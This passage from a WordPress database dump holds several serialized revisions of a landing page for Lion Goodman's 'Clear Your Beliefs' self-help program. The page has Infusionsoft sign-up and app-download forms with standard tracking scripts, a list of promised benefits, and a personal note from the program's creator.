iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n         <input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" class="infusion-form nd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click &#a;Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n        <input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" />\n</div>\n</form>\n\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1129:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n        <input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1297, 1757, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1953:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1123:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div><p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n       <input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1294, 1754, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1990:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" class="infusion-form nd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click &#a;Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="padding:0px !important;">\n        <input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" />\n</div>\n</form>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" class="infusion-form nd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click &#a;Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding:0px !important;">\n         <input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1129:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n        <input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  